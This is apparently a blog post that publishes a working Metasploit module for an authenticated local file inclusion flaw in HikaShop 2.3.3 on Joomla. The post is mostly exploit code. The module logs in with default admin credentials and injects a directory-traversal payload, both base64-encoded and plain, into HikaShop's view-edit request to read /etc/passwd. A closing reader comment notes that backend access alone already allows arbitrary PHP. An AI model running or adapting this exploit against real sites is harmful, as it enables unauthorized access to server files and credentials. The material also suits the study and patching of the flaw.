Nearly 2 weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.
Here we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.
Below you will find a dirty MSF poc for LFI vulnerability located in HikaShop 2.3.3. ;)
Let me know if your Joomla is vulnerable. ;) If you will have any troubles with running this poc,
just check how I've done that before or feel free to contact me with any questions/suggestions.
Loading exploit:
Running:
... and finally we will get the content of /etc/passwd:
Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HikaShop - LFI poc for authenticated users',
'Description' => %q{
HikaShop 2.3.3 is vulnerable to local file include attack.
Authenticated user can read local files from the server.
Vulnerability was described on https://twitter.com/HauntITBlog
},
'Author' =>
[
'HauntIT Blog', # Discovery / msf module
'http://hauntit.blogspot.com'
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '03.01.2015'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
], self.class)
end
def check
end
def fetchMd5(my_string)
if my_string =~ /([0-9a-fA-F]{32})/
return $1
end
return nil
end
def exploit
# 1st, we will get cookies and token
req1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php')
})
cookies = req1['set-cookie']
if not req1
fail_with("[-] Failed with 1st request")
end
print_status("[+] Resp code: " + req1.code.to_s)
print_good("[+] Cookie(s) : " + cookies)
token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
if req1.body =~ token_pattern
token = fetchMd5(req1.body)
print_good("[+] Token : "+ token.to_s)
else
print_status("[-] Token not found")
end
# now we need to do auth using that token and cookies
print_status("[+] 2nd request (post with auth)")
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'option' => 'com_login',
'task' => 'login',
'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
token.to_s => 1
}
})
print_good("[+] Code after auth: " + auth.code.to_s)
# 3rd step: get + post params to lfi
print_status('[+] and now 3rd request...')
xpl = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'vars_get' => {
'option' => 'com_hikashop',
'ctrl' => 'view',
'task' => 'edit',
'id' => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
},
'cookie' => cookies
})
if xpl
print_good("[+] 3rd response code: " + xpl.code.to_s)
print_good("[+] 3rd (full) response body:")
print_status(xpl.body)
else
fail_with("[-] Cannot exploit it :C")
end
end # exploit
end
---<hikashop_auth_lfi.rb>---
And pastebin version is here.
Happy New Year! ;)
This requires you to have access to the backend of the website AND access to the view edition interface of hikashop. There, you can directly edit any view of hikashop and add custom PHP into them. So no need to go to all that trouble. Just add a line of PHP code in one of the views to read the file you want on the server.
ReplyDelete